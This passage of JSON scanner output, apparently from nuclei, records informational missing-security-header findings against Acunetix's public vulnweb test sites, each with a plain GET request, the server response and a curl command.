\\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.972725488Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.972786617Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:56.972797765Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"path\":\"/CVS/Entries\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Entries\",\"request\":\"GET /CVS/Entries HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 1\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nEtag: \\\"4dca64a4-1\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n \",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:56.972804509Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52' 'http://testphp.vulnweb.com/CVS/Entries'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/–\",\"path\":\"/–\",\"matched-at\":\"http://testasp.vulnweb.com/%E2%80%93\",\"request\":\"GET /%E2%80%93 HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nContent-Length: 1245\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e404 - File or directory not found.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e404 - File or directory not found.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eThe resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:57.395298445Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15' 'http://testasp.vulnweb.com/%E2%80%93'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"strict-transport-security\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/partials\",\"path\":\"/static/app/partials\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/partials/\",\"request\":\"GET /static/app/partials HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:50 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e403 Forbidden\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e403 Forbidden\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:57.395320541Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.32' 'http://testhtml5.vulnweb.com/static/app/partials'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca 